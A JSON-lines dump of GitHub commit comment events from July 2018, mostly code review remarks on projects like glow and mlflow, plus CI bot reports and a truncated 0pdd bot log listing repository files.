{"id":"7959073385","type":"CommitCommentEvent","actor":{"login":"sjl2"},"repo":{"name":"lob/lob-node"},"payload":{"comment":{"id":29692197,"position":9,"line":9,"path":"CHANGELOG.md","commit_id":"0873b10560ed057d8bfe41b38b839cf172e7d79d","created_at":"2018-07-12T22:36:38Z","updated_at":"2018-07-12T22:36:38Z","author_association":"NONE","body":"Actually, the [docs](https://www.focacciacatering.com/weeklymenu) have been updated since you've last worked here. Thank you for your contribution though!"}},"created_at":"2018-07-12T22:36:38Z"}
{"id":"7959085645","type":"CommitCommentEvent","actor":{"login":"opti-mix"},"repo":{"name":"ZchiPitt/glow"},"payload":{"comment":{"id":29692230,"position":16,"line":586,"path":"lib/Backends/OpenCL/OpenCL.cpp","commit_id":"e77e54f16a331628f4fca95785ef5a84cc373e41","created_at":"2018-07-12T22:40:07Z","updated_at":"2018-07-12T22:40:07Z","author_association":"NONE","body":"IIRC, we have now a helper method that does exactly what this loop does."}},"created_at":"2018-07-12T22:40:07Z"}
{"id":"7959086937","type":"CommitCommentEvent","actor":{"login":"opti-mix"},"repo":{"name":"ZchiPitt/glow"},"payload":{"comment":{"id":29692235,"position":38,"line":608,"path":"lib/Backends/OpenCL/OpenCL.cpp","commit_id":"e77e54f16a331628f4fca95785ef5a84cc373e41","created_at":"2018-07-12T22:40:27Z","updated_at":"2018-07-12T22:40:27Z","author_association":"NONE","body":"Again, I think we have a helper method for this now."}},"created_at":"2018-07-12T22:40:27Z"}
{"id":"7959089158","type":"CommitCommentEvent","actor":{"login":"opti-mix"},"repo":{"name":"ZchiPitt/glow"},"payload":{"comment":{"id":29692242,"position":20,"line":590,"path":"lib/Backends/OpenCL/OpenCL.cpp","commit_id":"e77e54f16a331628f4fca95785ef5a84cc373e41","created_at":"2018-07-12T22:41:04Z","updated_at":"2018-07-12T22:41:04Z","author_association":"NONE","body":"So, you decided to avoid introducing a helper struct to hold a scale and an offset and pass this struct as a parameter?"}},"created_at":"2018-07-12T22:41:04Z"}
{"id":"7959091645","type":"CommitCommentEvent","actor":{"login":"opti-mix"},"repo":{"name":"ZchiPitt/glow"},"payload":{"comment":{"id":29692253,"position":11,"line":185,"path":"lib/Backends/OpenCL/OpenCL.h","commit_id":"e77e54f16a331628f4fca95785ef5a84cc373e41","created_at":"2018-07-12T22:41:48Z","updated_at":"2018-07-12T22:41:48Z","author_association":"NONE","body":"Some of the cases are commented out. Why? Either remove them for now or add a comment with an explanation."}},"created_at":"2018-07-12T22:41:48Z"}
{"id":"7959095573","type":"CommitCommentEvent","actor":{"login":"MalerSabina"},"repo":{"name":"westes/flex"},"payload":{"comment":{"id":29692263,"position":null,"line":null,"path":null,"commit_id":"dec42ee1fc34068bd71464be4ff62f44afa109cb","created_at":"2018-07-12T22:42:56Z","updated_at":"2018-07-12T22:42:56Z","author_association":"NONE","body":"Thanks "}},"created_at":"2018-07-12T22:42:56Z"}
{"id":"7959100431","type":"CommitCommentEvent","actor":{"login":"danieltaylor-nz"},"repo":{"name":"danieltaylor-nz/PopRestStore"},"payload":{"comment":{"id":29692271,"position":63,"line":310,"path":"screen/store/components/pages/AccountPage/AccountPage.html","commit_id":"4037d0630b5bec2abaa7b7fa8f42849b8f8ffad1","created_at":"2018-07-12T22:44:12Z","updated_at":"2018-07-12T22:44:12Z","author_association":"OWNER","body":"Always try and do the positive condition first:\r\n```\r\n    <span v-if=\"isUpdate\">Update Address</span>\r\n    <span v-else>Add Address</span>\r\n```\r\n\r\nIts easier to read \"If is update -> update address\" \r\nCompared with \"If is not update -> add address\" "}},"created_at":"2018-07-12T22:44:12Z"}
{"id":"7959101568","type":"CommitCommentEvent","actor":{"login":"opti-mix"},"repo":{"name":"ZchiPitt/glow"},"payload":{"comment":{"id":29692274,"position":38,"line":99,"path":"lib/Backends/OpenCL/kernels.cl","commit_id":"e77e54f16a331628f4fca95785ef5a84cc373e41","created_at":"2018-07-12T22:44:31Z","updated_at":"2018-07-12T22:44:31Z","author_association":"NONE","body":"`destTensorQuantizationScale` is too long for my taste. You can definitely remove \"tensor\" from the name. You also can remove \"Quantization\", as it is clear from the name of the function. You also pass only one scale and one offset, thus \"dest\" is probably not required to disambiguate. Which leaves us with \"scale\" and \"offset\" ;-)"}},"created_at":"2018-07-12T22:44:31Z"}
{"id":"7959102458","type":"CommitCommentEvent","actor":{"login":"opti-mix"},"repo":{"name":"ZchiPitt/glow"},"payload":{"comment":{"id":29692276,"position":38,"line":99,"path":"lib/Backends/OpenCL/kernels.cl","commit_id":"e77e54f16a331628f4fca95785ef5a84cc373e41","created_at":"2018-07-12T22:44:45Z","updated_at":"2018-07-12T22:44:45Z","author_association":"NONE","body":"The same applies to all functions below."}},"created_at":"2018-07-12T22:44:45Z"}
{"id":"7959104993","type":"CommitCommentEvent","actor":{"login":"opti-mix"},"repo":{"name":"ZchiPitt/glow"},"payload":{"comment":{"id":29692284,"position":66,"line":127,"path":"lib/Backends/OpenCL/kernels.cl","commit_id":"e77e54f16a331628f4fca95785ef5a84cc373e41","created_at":"2018-07-12T22:45:29Z","updated_at":"2018-07-12T22:45:29Z","author_association":"NONE","body":"Is there a test case for these two instructions?"}},"created_at":"2018-07-12T22:45:29Z"}
{"id":"7959110848","type":"CommitCommentEvent","actor":{"login":"opti-mix"},"repo":{"name":"ZchiPitt/glow"},"payload":{"comment":{"id":29692298,"position":20,"line":249,"path":"lib/Backends/OpenCL/kernels.cl","commit_id":"236b7b9991a746491f9d631fdce39cc9e47d7892","created_at":"2018-07-12T22:47:10Z","updated_at":"2018-07-12T22:47:10Z","author_association":"NONE","body":"Why not pass QuantizationTransform32To8 params to this function? Why do you expand them in the W function below? Does it help you with something?"}},"created_at":"2018-07-12T22:47:10Z"}
{"id":"7959112350","type":"CommitCommentEvent","actor":{"login":"cgcloud-jenkins"},"repo":{"name":"vgteam/vg"},"payload":{"comment":{"id":29692299,"position":null,"line":null,"path":null,"commit_id":"8124bd7b7581b644961c666ca3897e15b8ae42fe","created_at":"2018-07-12T22:47:37Z","updated_at":"2018-07-12T22:47:37Z","author_association":"NONE","body":"[Jenkins vg tests](http://jenkins.cgcloud.info/job/vg/1996/) complete for merge to master.  View the [full report here](http://cgl-pipeline-inputs.s3.amazonaws.com/vg_cgl/vg_ci/jenkins_reports/branch/master/index.html).\n\n19 tests passed, 0 tests failed and 10 tests skipped in 20670 seconds\n\nTests produced 2928 warnings. 2928 were for lower-than-expected alignment scores\n\n"}},"created_at":"2018-07-12T22:47:37Z"}
{"id":"7959113639","type":"CommitCommentEvent","actor":{"login":"opti-mix"},"repo":{"name":"ZchiPitt/glow"},"payload":{"comment":{"id":29692301,"position":67,"line":2509,"path":"tests/unittests/OperatorTest.cpp","commit_id":"236b7b9991a746491f9d631fdce39cc9e47d7892","created_at":"2018-07-12T22:48:00Z","updated_at":"2018-07-12T22:48:00Z","author_association":"NONE","body":"This is nice. If you support more operations already, add them here."}},"created_at":"2018-07-12T22:48:00Z"}
{"id":"7959115925","type":"CommitCommentEvent","actor":{"login":"opti-mix"},"repo":{"name":"ZchiPitt/glow"},"payload":{"comment":{"id":29692311,"position":60,"line":2502,"path":"tests/unittests/OperatorTest.cpp","commit_id":"236b7b9991a746491f9d631fdce39cc9e47d7892","created_at":"2018-07-12T22:48:39Z","updated_at":"2018-07-12T22:48:39Z","author_association":"NONE","body":"ElementWise -> Elementwise\r\n\r\nOr may be even DataParallel?"}},"created_at":"2018-07-12T22:48:39Z"}
{"id":"7959116894","type":"CommitCommentEvent","actor":{"login":"pmeenan"},"repo":{"name":"WPO-Foundation/webpagetest"},"payload":{"comment":{"id":29692314,"position":null,"line":null,"path":null,"commit_id":"98263d8a9730885fd701954195edd7f4e66867b4","created_at":"2018-07-12T22:48:55Z","updated_at":"2018-07-12T22:48:55Z","author_association":"CONTRIBUTOR","body":"Lighthouse updated to 3.0 around then and changed the structure of the json.  WebPageTest just passes the lighthouse json through.\n\n________________________________\nFrom: Michael Angelo <notifications@github.com>\nSent: Thursday, July 12, 2018 4:52:33 PM\nTo: WPO-Foundation/webpagetest\nCc: Patrick Meenan; Mention\nSubject: Re: [WPO-Foundation/webpagetest] Limit the testlog output (98263d8)\n\n\n@pmeenan<https://github.com/pmeenan> I am getting this error in my logs Cannot read property '1' of undefined at lighthouseResultsTransfrom from the WPT I'm trying to run, it started logging this 14 days ago which lead me to this commit. I don't know if this change would the JSON that is returned. do you have any insight? Or has there been a change to the Lighthouse JSON data within WPT?\n\n—\nYou are receiving this because you were mentioned.\nReply to this email directly, view it on GitHub<https://github.com/WPO-Foundation/webpagetest/commit/98263d8a9730885fd701954195edd7f4e66867b4#commitcomment-29690977>, or mute the thread<https://github.com/notifications/unsubscribe-auth/AAbHBbMyLCfbFjdT2VVWKsVTDy7ja0xXks5uF7cRgaJpZM4VNtJf>.\n"}},"created_at":"2018-07-12T22:48:55Z"}
{"id":"7959117298","type":"CommitCommentEvent","actor":{"login":"peterdolan"},"repo":{"name":"lob/lob-node"},"payload":{"comment":{"id":29692315,"position":9,"line":9,"path":"CHANGELOG.md","commit_id":"0873b10560ed057d8bfe41b38b839cf172e7d79d","created_at":"2018-07-12T22:49:02Z","updated_at":"2018-07-12T22:49:02Z","author_association":"CONTRIBUTOR","body":"nit: `s/Actually, the docs have been updated since you've last worked here. Thank you for your contribution though!/stewart_suxxxx`"}},"created_at":"2018-07-12T22:49:02Z"}
{"id":"7959118262","type":"CommitCommentEvent","actor":{"login":"opti-mix"},"repo":{"name":"ZchiPitt/glow"},"payload":{"comment":{"id":29692320,"position":60,"line":2502,"path":"tests/unittests/OperatorTest.cpp","commit_id":"236b7b9991a746491f9d631fdce39cc9e47d7892","created_at":"2018-07-12T22:49:18Z","updated_at":"2018-07-12T22:49:18Z","author_association":"NONE","body":"Add a comment for the test"}},"created_at":"2018-07-12T22:49:18Z"}
{"id":"7959119233","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29692324,"position":null,"line":null,"path":null,"commit_id":"8bf8dbe9c3e2b13dc4c9ee5a07612d672b5c8fc7","created_at":"2018-07-12T22:49:36Z","updated_at":"2018-07-12T22:49:36Z","author_association":"NONE","body":"issue_6802 (mbadams5) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1685 of 1685 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-8bf8dbe9c3e2b13dc4c9ee5a07612d672b5c8fc7-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-8bf8dbe9c3e2b13dc4c9ee5a07612d672b5c8fc7-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-8bf8dbe9c3e2b13dc4c9ee5a07612d672b5c8fc7-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-40.0%25-green.png)</a>\n"}},"created_at":"2018-07-12T22:49:36Z"}
{"id":"7959120022","type":"CommitCommentEvent","actor":{"login":"opti-mix"},"repo":{"name":"ZchiPitt/glow"},"payload":{"comment":{"id":29692327,"position":67,"line":2509,"path":"tests/unittests/OperatorTest.cpp","commit_id":"236b7b9991a746491f9d631fdce39cc9e47d7892","created_at":"2018-07-12T22:49:51Z","updated_at":"2018-07-12T22:49:51Z","author_association":"NONE","body":"Overall, the commit looks pretty good, modulo minor my comments."}},"created_at":"2018-07-12T22:49:51Z"}
{"id":"7959122488","type":"CommitCommentEvent","actor":{"login":"pantheondocs"},"repo":{"name":"pantheon-systems/documentation"},"payload":{"comment":{"id":29692330,"position":null,"line":null,"path":null,"commit_id":"0e8b45d746240b23c89b04eb7fc906ed790b07b9","created_at":"2018-07-12T22:50:36Z","updated_at":"2018-07-12T22:50:36Z","author_association":"NONE","body":"The following doc(s) have been deployed to the [updatersyn](https://updatersyn-static-docs.pantheonsite.io/docs) Multidev environment:\n- [/docs/wp-config-php](https://updatersyn-static-docs.pantheonsite.io/docs/wp-config-php)\n"}},"created_at":"2018-07-12T22:50:36Z"}
{"id":"7959127518","type":"CommitCommentEvent","actor":{"login":"jaceklaskowski"},"repo":{"name":"databricks/mlflow"},"payload":{"comment":{"id":29692344,"position":18,"line":321,"path":"docs/source/models.rst","commit_id":"d671684d21c03289c3fc0cbf2d406ef826ab3ac1","created_at":"2018-07-12T22:52:06Z","updated_at":"2018-07-12T22:52:06Z","author_association":"NONE","body":"Just curious why the change to add \"Apache\" was required for a Spark UDF, but not for a Spark cluster a bit further in the sentence? I don't think \"Apache\" should be in either case and I would also support using a simple \"a UDF\"."}},"created_at":"2018-07-12T22:52:06Z"}
{"id":"7959128348","type":"CommitCommentEvent","actor":{"login":"larsenv"},"repo":{"name":"larsenv/EriKiorai-ify"},"payload":{"comment":{"id":29692346,"position":null,"line":null,"path":null,"commit_id":"ef2cda98df25cad671f9073a2db0e825ce5d5b9d","created_at":"2018-07-12T22:52:20Z","updated_at":"2018-07-12T22:52:20Z","author_association":"OWNER","body":"If you scrolled down here all the way, congratulations!\r\n\r\nI accidentally committed the \"venv\" folder to this repository."}},"created_at":"2018-07-12T22:52:20Z"}
{"id":"7959129087","type":"CommitCommentEvent","actor":{"login":"effekt92"},"repo":{"name":"giero/LGoH-deck-suggester"},"payload":{"comment":{"id":29692348,"position":4,"line":1691,"path":"data/heroes_all.json","commit_id":"791be4c85c1bd6466f9b31963b0e265f9a6e1054","created_at":"2018-07-12T22:52:34Z","updated_at":"2018-07-12T22:52:34Z","author_association":"NONE","body":"To alyson"}},"created_at":"2018-07-12T22:52:34Z"}
{"id":"7959129136","type":"CommitCommentEvent","actor":{"login":"larsenv"},"repo":{"name":"larsenv/EriKiorai-ify"},"payload":{"comment":{"id":29692349,"position":null,"line":null,"path":null,"commit_id":"ef2cda98df25cad671f9073a2db0e825ce5d5b9d","created_at":"2018-07-12T22:52:35Z","updated_at":"2018-07-12T22:52:35Z","author_association":"OWNER","body":"If you scrolled down here all the way, congratulations!\r\n\r\nI accidentally committed the \"venv\" folder PyCharm made to this repository."}},"created_at":"2018-07-12T22:52:35Z"}
{"id":"7959129242","type":"CommitCommentEvent","actor":{"login":"shadowwalkersb"},"repo":{"name":"cryoem/eman2"},"payload":{"comment":{"id":29692350,"position":5,"line":113,"path":"libpyEM/qtgui/emplot2d.py","commit_id":"bcef833010c5859e2bf66403d87a0df2344ea5f6","created_at":"2018-07-12T22:52:37Z","updated_at":"2018-07-12T22:52:37Z","author_association":"MEMBER","body":"Sorry, was this decided somewhere and did I miss it? The pull request now has merge conflicts."}},"created_at":"2018-07-12T22:52:37Z"}
{"id":"7959132665","type":"CommitCommentEvent","actor":{"login":"angel5644"},"repo":{"name":"angel5644/AdministraGastos"},"payload":{"comment":{"id":29692359,"position":null,"line":null,"path":null,"commit_id":"c988fa6558c330ced064ccd8b8d910445dabd9ae","created_at":"2018-07-12T22:53:32Z","updated_at":"2018-07-12T22:53:32Z","author_association":"OWNER","body":"This one is for #6 too."}},"created_at":"2018-07-12T22:53:32Z"}
{"id":"7959139437","type":"CommitCommentEvent","actor":{"login":"halonazhao"},"repo":{"name":"JacquesCarette/Drasil"},"payload":{"comment":{"id":29692380,"position":4,"line":86,"path":"code/Example/Drasil/SWHS/Body.hs","commit_id":"45016d66ff58479e2ac553bee2024689622d26da","created_at":"2018-07-12T22:55:39Z","updated_at":"2018-07-12T22:55:39Z","author_association":"COLLABORATOR","body":"This has been fixed : )"}},"created_at":"2018-07-12T22:55:39Z"}
{"id":"7959141677","type":"CommitCommentEvent","actor":{"login":"kimb"},"repo":{"name":"MeridianOXC/OpenXcom"},"payload":{"comment":{"id":29692385,"position":null,"line":null,"path":null,"commit_id":"bc9f3b980e08171863869044cd66059a60309dc2","created_at":"2018-07-12T22:56:22Z","updated_at":"2018-07-12T22:56:22Z","author_association":"NONE","body":"Causes linking to fail on current (2018) Gentoo with yaml-cpp version 0.6.2.\r\n\r\nErrors like this for every(?) file including yaml:\r\n``CMakeFiles/openxcom.dir/Battlescape/AIModule.cpp.o: In function `OpenXcom::AIModule::save() const':\r\nAIModule.cpp:(.text+0x7e41): undefined reference to `YAML::detail::node_data::set_scalar(std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&)'\r\nCMakeFiles/openxcom.dir/Battlescape/AIModule.cpp.o: In function `YAML::Node::Node<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > >(std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&)':\r\nAIModule.cpp:(.text._ZN4YAML4NodeC2INSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEEEERKT_[_ZN4YAML4NodeC5INSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEEEERKT_]+0x112): undefined reference to `YAML::detail::node_data::set_scalar(std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&)'\r\n``"}},"created_at":"2018-07-12T22:56:22Z"}
{"id":"7959143110","type":"CommitCommentEvent","actor":{"login":"halonazhao"},"repo":{"name":"JacquesCarette/Drasil"},"payload":{"comment":{"id":29692387,"position":16,"line":160,"path":"code/Example/Drasil/SWHS/Body.hs","commit_id":"45016d66ff58479e2ac553bee2024689622d26da","created_at":"2018-07-12T22:56:50Z","updated_at":"2018-07-12T22:56:50Z","author_association":"COLLABORATOR","body":"Checked. This line has been removed."}},"created_at":"2018-07-12T22:56:50Z"}
{"id":"7959144175","type":"CommitCommentEvent","actor":{"login":"0pdd"},"repo":{"name":"skapral/puzzlerbot"},"payload":{"comment":{"id":29692392,"position":null,"line":null,"path":null,"commit_id":"125154f2f7b15182b0d3843eaa7e7db0f9e1e4be","created_at":"2018-07-12T22:57:10Z","updated_at":"2018-07-12T22:57:10Z","author_association":"NONE","body":"I wasn't able to retrieve PDD puzzles from the code base and submit them to GitHub. If you think that it's a bug on our side, please submit it to [yegor256/0pdd](https://github.com/yegor256/0pdd/issues):\n\n> set -x && set -e && set -o pipefail && cd /tmp/0pdd20180712-4-7bdj5u/skapral/puzzlerbot && pdd -v -f /tmp/20180712-1986-1etfaf [1]: bash: warning: setlocale: LC_ALL: cannot change locale (UTF-8) + set -e + set -o pipefail + cd /tmp/0pdd20180712-4-7bdj5u/skapral/puzzlerbot + pdd -v -f...\n\n\nPlease, copy and paste this stack trace to GitHub:\n\n\n```\nUserError\nset -x && set -e && set -o pipefail && cd /tmp/0pdd20180712-4-7bdj5u/skapral/puzzlerbot && pdd -v -f /tmp/20180712-1986-1etfaf [1]:\nbash: warning: setlocale: LC_ALL: cannot change locale (UTF-8)\n+ set -e\n+ set -o pipefail\n+ cd /tmp/0pdd20180712-4-7bdj5u/skapral/puzzlerbot\n+ pdd -v -f /tmp/20180712-1986-1etfaf\n\nFound 2 lines in /tmp/0pdd20180712-4-7bdj5u/skapral/puzzlerbot/.pdd\nMy version is 0.20.3\nRuby version is 2.3.3 at x86_64-linux\nReading .\nExcluding **/target/**/*\n148 file(s) found, 260 excluded\n/tmp/0pdd20180712-4-7bdj5u/skapral/puzzlerbot/.mvn/wrapper/maven-wrapper.jar is a binary file (48336 bytes)\nReading mvnw.cmd...\nReading .pdd...\nReading puzzler-core/src/test/java/com/github/skapral/puzzler/mock/MockSrvImplementationTest.java...\nReading puzzler-core/src/test/java/com/github/skapral/puzzler/core/text/threepars/AssertTextInstanceProducesCertainParagraphsTest.java...\nReading puzzler-core/src/test/java/com/github/skapral/puzzler/core/text/threepars/TxtStandardTest.java...\nReading puzzler-core/src/test/java/com/github/skapral/puzzler/core/puzzle/AssertPuzzleHasCertainTitleAndDescriptionTest.java...\nReading puzzler-core/src/test/java/com/github/skapral/puzzler/core/source/AssertPuzzleSourceProducesCertainPuzzlesTest.java...\nReading puzzler-core/src/test/java/com/github/skapral/puzzler/core/source/PsrcFromCommentsTest.java...\nReading puzzler-core/src/test/java/com/github/skapral/puzzler/core/config/CpOneOfTest.java...\nReading puzzler-core/src/main/java/com/github/skapral/puzzler/mock/MockSrvImplementation.java...\nPuzzle 69-9dd0b135 0/DEV at puzzler-core/src/main/java/com/github/skapral/puzzler/mock/MockSrvImplementation.java\nReading puzzler-core/src/main/java/com/github/skapral/puzzler/mock/AssertAssumingMockServer.java...\nReading puzzler-core/src/main/java/com/github/skapral/puzzler/mock/AssertHttpEndpointProducesExpectedResponse.java...\nReading puzzler-core/src/main/java/com/github/skapral/puzzler/mock/MockServer.java...\nReading puzzler-core/src/main/java/com/github/skapral/puzzler/mock/package-info.java...\nReading puzzler-core/src/main/java/com/github/skapral/puzzler/core/text/threepars/Text.java...\nReading puzzler-core/src/main/java/com/github/skapral/puzzler/core/text/threepars/TxtStatic.java...\nReading puzzler-core/src/main/java/com/github/skapral/puzzler/core/text/threepars/TriggerWord.java...\nReading puzzler-core/src/main/java/com/github/skapral/puzzler/core/text/threepars/AssertTextInstanceProducesCertainParagraphs.java...\nReading puzzler-core/src/main/java/com/github/skapral/puzzler/core/text/threepars/TxtBase.java...\nReading puzzler-core/src/main/java/com/github/skapral/puzzler/core/text/threepars/TxtTrim.java...\nReading puzzler-core/src/main/java/com/github/skapral/puzzler/core/text/threepars/TwStatic.java...\nReading puzzler-core/src/main/java/com/github/skapral/puzzler/core/text/threepars/package-info.java...\nReading puzzler-core/src/main/java/com/github/skapral/puzzler/core/text/threepars/TxtStandard.java...\nReading puzzler-core/src/main/java/com/github/skapral/puzzler/core/text/threepars/Paragraph.java...\nReading puzzler-core/src/main/java/com/github/skapral/puzzler/core/text/threepars/ParStatic.java...\nReading puzzler-core/src/main/java/com/github/skapral/puzzler/core/operation/OpPersistAllPuzzles.java...\nReading puzzler-core/src/main/java/com/github/skapral/puzzler/core/operation/OpDoNothing.java...\nReading puzzler-core/src/main/java/com/github/skapral/puzzler/core/operation/AssertOperationFails.java...\nReading puzzler-core/src/main/java/com/github/skapral/puzzler/core/operation/OpFail.java...\nReading puzzler-core/src/main/java/com/github/skapral/puzzler/core/operation/package-info.java...\nReading puzzler-core/src/main/java/com/github/skapral/puzzler/core/operation/AssertOperationSuccessful.java...\nReading puzzler-core/src/main/java/com/github/skapral/puzzler/core/PuzzleSource.java...\nReading puzzler-core/src/main/java/com/github/skapral/puzzler/core/Puzzle.java...\nReading puzzler-core/src/main/java/com/github/skapral/puzzler/core/Operation.java...\nReading puzzler-core/src/main/java/com/github/skapral/puzzler/core/puzzle/AssertPuzzleHasCertainTitleAndDescription.java...\nReading puzzler-core/src/main/java/com/github/skapral/puzzler/core/puzzle/PzlStatic.java...\nReading puzzler-core/src/main/java/com/github/skapral/puzzler/core/puzzle/package-info.java...\nReading puzzler-core/src/main/java/com/github/skapral/puzzler/core/puzzle/PzlUsingThreeParsText.java...\nReading puzzler-core/src/main/java/com/github/skapral/puzzler/core/IssueTracker.java...\nReading puzzler-core/src/main/java/com/github/skapral/puzzler/core/package-info.java...\nReading puzzler-core/src/main/java/com/github/skapral/puzzler/core/itracker/ItToList.java...\nReading puzzler-core/src/main/java/com/github/skapral/puzzler/core/itracker/package-info.java...\nReading puzzler-core/src/main/java/com/github/skapral/puzzler/core/source/AssertPuzzleSourceProducesCertainPuzzles.java...\nReading puzzler-core/src/main/java/com/github/skapral/puzzler/core/source/AssertPuzzleSourceProducesNoPuzzles.java...\nReading puzzler-core/src/main/java/com/github/skapral/puzzler/core/source/PsrcFromComments.java...\nReading puzzler-core/src/main/java/com/github/skapral/puzzler/core/source/PsrcCombined.java...\nReading puzzler-core/src/main/java/com/github/skapral/puzzler/core/source/package-info.java...\nReading puzzler-core/src/main/java/com/github/skapral/puzzler/core/source/PsrcStatic.java...\nReading puzzler-core/src/main/java/com/github/skapral/puzzler/core/source/PsrcInferred.java...\nReading puzzler-core/src/main/java/com/github/skapral/puzzler/core/config/CpOneOf.java...\nReading puzzler-core/src/main/java/com/github/skapral/puzzler/core/config/CpStatic.java...\nReading puzzler-core/src/main/java/com/github/skapral/puzzler/core/config/CpEnvironment.java...\nReading puzzler-core/src/main/java/com/github/skapral/puzzler/core/config/AssertConfigPropertyHasValue.java...\nReading puzzler-core/src/main/java/com/github/skapral/puzzler/core/config/ConfigProperty.java...\nReading puzzler-core/src/main/java/com/github/skapral/puzzler/core/config/CpMissingValue.java...\nReading puzzler-core/src/main/java/com/github/skapral/puzzler/core/config/AssertConfigPropertyIsUnitialized.java...\nReading puzzler-core/src/main/java/com/github/skapral/puzzler/core/config/package-info.java...\nReading puzzler-core/pom.xml...\nReading DEPLOYMENT.md...\nReading .github/PULL_REQUEST_TEMPLATE.md...\nReading .github/ISSUE_TEMPLATE.md...\nReading pom.xml...\nReading mvnw...\nReading puzzler-app/src/main/java/com/github/skapral/puzzler/app/Bootstrap.java...\nReading puzzler-app/src/main/java/com/github/skapral/puzzler/app/package-info.java...\nReading puzzler-app/pom.xml...\nReading README.md...\nPuzzle 31-c7cfd7be 0/DEV at README.md\nReading deploy.sh...\nReading .gitignore...\nReading Procfile...\nReading .travis.yml...\nReading LICENSE...\nReading .mvn/wrapper/maven-wrapper.properties...\nReading .mvn/wrapper/MavenWrapperDownloader.java...\nReading puzzler-web/src/main/java/com/github/skapral/puzzler/web/SrvGrizzlyWithJersey.java...\nReading puzzler-web/src/main/java/com/github/skapral/puzzler/web/Server.java...\nReading puzzler-web/src/main/java/com/github/skapral/puzzler/web/jersey/DefaultExceptionMapper.java...\nReading puzzler-web/src/main/java/com/github/skapral/puzzler/web/jersey/PuzzlerAPI.java...\nReading puzzler-web/src/main/java/com/github/skapral/puzzler/web/jersey/StatusEndpoint.java...\nReading puzzler-web/src/main/java/com/github/skapral/puzzler/web/jersey/GithubHookEndpoint.java...\nReading puzzler-web/src/main/java/com/github/skapral/puzzler/web/jersey/AuthenticationExceptionMapper.java...\nReading puzzler-web/src/main/java/com/github/skapral/puzzler/web/jersey/package-info.java...\nReading puzzler-web/src/main/java/com/github/skapral/puzzler/web/jersey/GitlabHookEndpoint.java...\nReading puzzler-web/src/main/java/com/github/skapral/puzzler/web/package-info.java...\nReading puzzler-web/src/main/java/com/github/skapral/puzzler/config/Cp_PORT.java...\nReading puzzler-web/src/main/java/com/github/skapral/puzzler/config/package-info.java...\nReading puzzler-web/pom.xml...\nReading puzzler-gitlab/src/test/java/com/github/skapral/puzzler/gitlab/operation/OpValidatingGitlabEventTokenTest.java...\nReading puzzler-gitlab/src/test/java/com/github/skapral/puzzler/gitlab/source/PsrcFromGitlabEventTest.java...\nReading puzzler-gitlab/src/test/resources/testIssueEvent.json...\nReading puzzler-gitlab/src/test/resources/testComments.json...\nReading puzzler-gitlab/src/test/resources/testMergeRequestEvent.json...\nReading puzzler-gitlab/src/main/java/com/github/skapral/puzzler/gitlab/text/threepars/TwPuzzlerbotUser.java...\nReading puzzler-gitlab/src/main/java/com/github/skapral/puzzler/gitlab/text/threepars/package-info.java...\nReading puzzler-gitlab/src/main/java/com/github/skapral/puzzler/gitlab/location/GlapiStatic.java...\nReading puzzler-gitlab/src/main/java/com/github/skapral/puzzler/gitlab/location/package-info.java...\nReading puzzler-gitlab/src/main/java/com/github/skapral/puzzler/gitlab/location/GitlabAPI.java...\nReading puzzler-gitlab/src/main/java/com/github/skapral/puzzler/gitlab/location/GlapiProduction.java...\nReading puzzler-gitlab/src/main/java/com/github/skapral/puzzler/gitlab/operation/OpValidatingGitlabEventToken.java...\nReading puzzler-gitlab/src/main/java/com/github/skapral/puzzler/gitlab/operation/package-info.java...\nReading puzzler-gitlab/src/main/java/com/github/skapral/puzzler/gitlab/project/GitlabProject.java...\nReading puzzler-gitlab/src/main/java/com/github/skapral/puzzler/gitlab/project/GprjFromGitlabEvent.java...\nReading puzzler-gitlab/src/main/java/com/github/skapral/puzzler/gitlab/project/package-info.java...\nReading puzzler-gitlab/src/main/java/com/github/skapral/puzzler/gitlab/itracker/package-info.java...\nReading puzzler-gitlab/src/main/java/com/github/skapral/puzzler/gitlab/itracker/ItGitlabIssues.java...\nReading puzzler-gitlab/src/main/java/com/github/skapral/puzzler/gitlab/source/PsrcFromGitlabNotes.java...\nReading puzzler-gitlab/src/main/java/com/github/skapral/puzzler/gitlab/source/PsrcFromGitlabEvent.java...\nPuzzle 27-7995c0a8 0/DEV at puzzler-gitlab/src/main/java/com/github/skapral/puzzler/gitlab/source/PsrcFromGitlabEvent.java\nReading puzzler-gitlab/src/main/java/com/github/skapral/puzzler/gitlab/source/package-info.java...\nReading puzzler-gitlab/src/main/java/com/github/skapral/puzzler/gitlab/config/Cp_GITLAB_HOOK_SECRET.java...\nReading puzzler-gitlab/src/main/java/com/github/skapral/puzzler/gitlab/config/Cp_GITLAB_AUTH_TOKEN.java...\nReading puzzler-gitlab/src/main/java/com/github/skapral/puzzler/gitlab/config/package-info.java...\nReading puzzler-gitlab/pom.xml...\nReading puzzler-github/src/test/java/com/github/skapral/puzzler/github/operation/OpIgnoringUnprivildgedEventSenderTest.java...\nReading puzzler-github/src/test/java/com/github/skapral/puzzler/github/operation/OpValidatingGithubEventSignatureTest.java...\nReading puzzler-github/src/test/java/com/github/skapral/puzzler/github/source/PsrcFromGithubCommentsTest.java...\nReading puzzler-github/src/test/java/com/github/skapral/puzzler/github/source/PsrcFromGithubEventTest.java...\nReading puzzler-github/src/test/resources/testIssueEvent.json...\nReading puzzler-github/src/test/resources/testPullRequestEvent.json...\nReading 